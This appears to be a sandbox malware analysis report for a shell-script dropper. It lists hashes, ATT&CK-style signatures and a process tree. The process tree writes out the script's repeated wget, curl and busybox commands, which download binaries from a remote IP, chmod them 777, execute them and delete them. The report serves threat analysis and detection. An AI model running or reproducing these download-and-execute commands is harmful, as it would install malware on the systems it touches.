Analysis
-
max time kernel
15s -
max time network
16s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
25/10/2024, 01:21
Static task
static1
Behavioral task
behavioral1
Sample
2c3e20875951ea008776d44baa8a3d95bfd87924982501915db7d3c1b6a6de8e.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
2c3e20875951ea008776d44baa8a3d95bfd87924982501915db7d3c1b6a6de8e.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
2c3e20875951ea008776d44baa8a3d95bfd87924982501915db7d3c1b6a6de8e.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
2c3e20875951ea008776d44baa8a3d95bfd87924982501915db7d3c1b6a6de8e.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
2c3e20875951ea008776d44baa8a3d95bfd87924982501915db7d3c1b6a6de8e.sh
-
Size
10KB
-
MD5
8695c3f5bc9a782d939a590ce31f75f3
-
SHA1
914e569c0a6610aac0f3009b5b8970f722aab8df
-
SHA256
2c3e20875951ea008776d44baa8a3d95bfd87924982501915db7d3c1b6a6de8e
-
SHA512
ca0e16c73a69de5d269bec40b6c389461cb0930553830b76e87bcd98c43bcc506fc81cdfedd919445aed23d40b6c0b45cc902815318deb69fa37f0909fd77b3b
-
SSDEEP
192:5P8Pu15ABxEJ3AUJMkxiq6tiZEuy15ABxGAUJMkxeq6tiZEL:5P8Pu15ABxEJ3AUJMkxnTy15ABxGAUJe
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 749 chmod 766 chmod 808 chmod 841 chmod 694 chmod 731 chmod 795 chmod 847 chmod 757 chmod 780 chmod 823 chmod 682 chmod 817 chmod 829 chmod 835 chmod -
Executes dropped EXE 15 IoCs
ioc pid Process /tmp/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh 684 l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh /tmp/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt 695 tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt /tmp/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9 733 yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9 /tmp/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh 750 5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh /tmp/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI 758 9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI /tmp/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH 768 FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH /tmp/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz 782 LQM2q0nlR58Eihs83rY31Yor6mBJko63jz /tmp/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN 796 94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN /tmp/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11 809 WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11 /tmp/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk 818 TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk /tmp/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM 824 cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM /tmp/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo 830 GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo /tmp/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd 836 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd /tmp/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl 842 RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl /tmp/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd 848 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd -
Checks CPU configuration 1 TTPs 15 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl -
Writes file to tmp directory 15 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt curl File opened for modification /tmp/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh curl File opened for modification /tmp/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN curl File opened for modification /tmp/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11 curl File opened for modification /tmp/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo curl File opened for modification /tmp/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9 curl File opened for modification /tmp/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH curl File opened for modification /tmp/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM curl File opened for modification /tmp/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl curl File opened for modification /tmp/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz curl File opened for modification /tmp/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh curl File opened for modification /tmp/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI curl File opened for modification /tmp/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk curl File opened for modification /tmp/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd curl File opened for modification /tmp/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd curl
Processes
-
/tmp/2c3e20875951ea008776d44baa8a3d95bfd87924982501915db7d3c1b6a6de8e.sh/tmp/2c3e20875951ea008776d44baa8a3d95bfd87924982501915db7d3c1b6a6de8e.sh1⤵PID:655
-
/bin/rm/bin/rm bins.sh2⤵PID:657
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:662
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:669
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:680
-
-
/bin/chmodchmod 777 l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- File and Directory Permissions Modification
PID:682
-
-
/tmp/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh./l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- Executes dropped EXE
PID:684
-
-
/bin/rmrm l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:685
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:686
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:690
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:692
-
-
/bin/chmodchmod 777 tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- File and Directory Permissions Modification
PID:694
-
-
/tmp/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt./tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- Executes dropped EXE
PID:695
-
-
/bin/rmrm tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:696
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:697
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:705
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:724
-
-
/bin/chmodchmod 777 yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- File and Directory Permissions Modification
PID:731
-
-
/tmp/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9./yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- Executes dropped EXE
PID:733
-
-
/bin/rmrm yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:734
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:735
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:739
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:746
-
-
/bin/chmodchmod 777 5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- File and Directory Permissions Modification
PID:749
-
-
/tmp/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh./5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- Executes dropped EXE
PID:750
-
-
/bin/rmrm 5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:751
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:752
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:754
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:756
-
-
/bin/chmodchmod 777 9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- File and Directory Permissions Modification
PID:757
-
-
/tmp/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI./9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- Executes dropped EXE
PID:758
-
-
/bin/rmrm 9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:759
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:760
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:761
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:762
-
-
/bin/chmodchmod 777 FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- File and Directory Permissions Modification
PID:766
-
-
/tmp/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH./FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- Executes dropped EXE
PID:768
-
-
/bin/rmrm FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:769
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:770
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:773
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:777
-
-
/bin/chmodchmod 777 LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- File and Directory Permissions Modification
PID:780
-
-
/tmp/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz./LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- Executes dropped EXE
PID:782
-
-
/bin/rmrm LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:783
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:784
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:787
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:792
-
-
/bin/chmodchmod 777 94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- File and Directory Permissions Modification
PID:795
-
-
/tmp/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN./94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- Executes dropped EXE
PID:796
-
-
/bin/rmrm 94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:797
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:798
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:802
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:806
-
-
/bin/chmodchmod 777 WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- File and Directory Permissions Modification
PID:808
-
-
/tmp/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11./WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- Executes dropped EXE
PID:809
-
-
/bin/rmrm WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:811
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:812
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:815
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:816
-
-
/bin/chmodchmod 777 TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- File and Directory Permissions Modification
PID:817
-
-
/tmp/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk./TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- Executes dropped EXE
PID:818
-
-
/bin/rmrm TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:819
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:820
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:821
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:822
-
-
/bin/chmodchmod 777 cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- File and Directory Permissions Modification
PID:823
-
-
/tmp/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM./cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- Executes dropped EXE
PID:824
-
-
/bin/rmrm cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:825
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:826
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:827
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:828
-
-
/bin/chmodchmod 777 GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo./GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- Executes dropped EXE
PID:830
-
-
/bin/rmrm GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:831
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:832
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:833
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:834
-
-
/bin/chmodchmod 777 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- File and Directory Permissions Modification
PID:835
-
-
/tmp/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd./0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- Executes dropped EXE
PID:836
-
-
/bin/rmrm 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:837
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:838
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:839
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:840
-
-
/bin/chmodchmod 777 RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- File and Directory Permissions Modification
PID:841
-
-
/tmp/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl./RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- Executes dropped EXE
PID:842
-
-
/bin/rmrm RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:843
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:844
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:845
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:846
-
-
/bin/chmodchmod 777 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- File and Directory Permissions Modification
PID:847
-
-
/tmp/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd./0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- Executes dropped EXE
PID:848
-
-
/bin/rmrm 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:849
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:850
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97